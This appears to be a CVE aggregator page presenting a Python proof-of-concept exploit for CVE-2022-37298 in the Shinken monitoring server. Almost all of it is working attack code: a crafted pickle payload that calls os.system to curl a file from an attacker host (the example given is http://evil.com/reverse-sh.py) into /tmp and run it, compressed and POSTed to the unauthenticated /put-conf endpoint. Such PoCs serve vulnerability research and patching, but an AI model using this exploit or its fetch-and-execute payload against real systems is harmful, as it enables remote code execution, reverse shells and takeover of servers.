CVE-2022-37298 – CVE Helper

README.md

Rendering markdown...

POC / CVE-2022-37298.py PY

⬇ Raw GitHub ✕ Close

import requests, zlib
from urllib.parse import urlencode

payload_drop = """cshinken.webui.bottlewebui
_load
(S'os:system("curl {}>/tmp/payload && python /tmp/payload")'
tR."""


def get_payload(payload_loc):
    return payload_drop.format(payload_loc)


def shinken_poc(target, payload):
    compressed_conf = zlib.compress(payload)
    asd = {"conf": compressed_conf}
    post_data = urlencode(asd)
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    r = requests.post(
        "http://{}/put-conf".format(target), headers=headers, data=post_data
    )
    print(r.status_code)
    print(r.text)


if __name__ == "__main__":
    shinken_srv = input("shinken server address and port (e.g. 172.17.0.4:7771): ")

    payload_loc = input("payload location (e.g. http://evil.com/reverse-sh.py): ")
    payload = get_payload(payload_loc)

    print("Sending payload to server http://{}/put-conf".format(shinken_srv))
    shinken_poc(shinken_srv, bytes(payload, "utf-8"))
    print("The end.")